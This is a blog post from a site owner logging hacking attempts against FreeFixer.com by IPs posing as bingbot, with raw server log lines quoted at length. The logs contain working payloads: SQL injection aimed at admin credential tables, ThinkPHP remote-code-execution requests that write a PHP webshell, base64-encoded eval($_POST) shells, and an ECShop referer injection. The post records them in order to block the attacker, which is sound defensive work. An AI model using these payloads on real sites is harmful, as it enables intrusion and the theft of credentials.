124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 – Hacking Attempt

hacking, IP addresses

Recently I’ve been keeping an eye on the traffic at FreeFixer.com and trying to block fake Bing and Google bots and other types of bad behaviour. This morning I found a bunch of hacking attempts from 106.52.197.96, which by they way appears to be located on the Tencent cloud computing (Beijing) Co., Ltd network range. I’m guessing one of Tencent’s cloud clients got hacked.

I’ve posted the requests below. 106.52.197.96 attempts to inject some PHP and SQL code. For obvious reason, this IP will be blocked in .htaccess.

106.52.197.96 - - [15/Sep/2019:20:00:03 -0700] "PUT //9n2q0m7jOHN7dcr6.txt HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[58B040zuEc1FAlfs]);{//../rss HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7349 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=19x8MpcV8A7T9DEl.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:13 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:14 -0700] "POST //index.php?s=index HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 - - [15/Sep/2019:20:00:15 -0700] "GET //d.php HTTP/1.1" 404 419 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //i.php HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:19 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:20 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
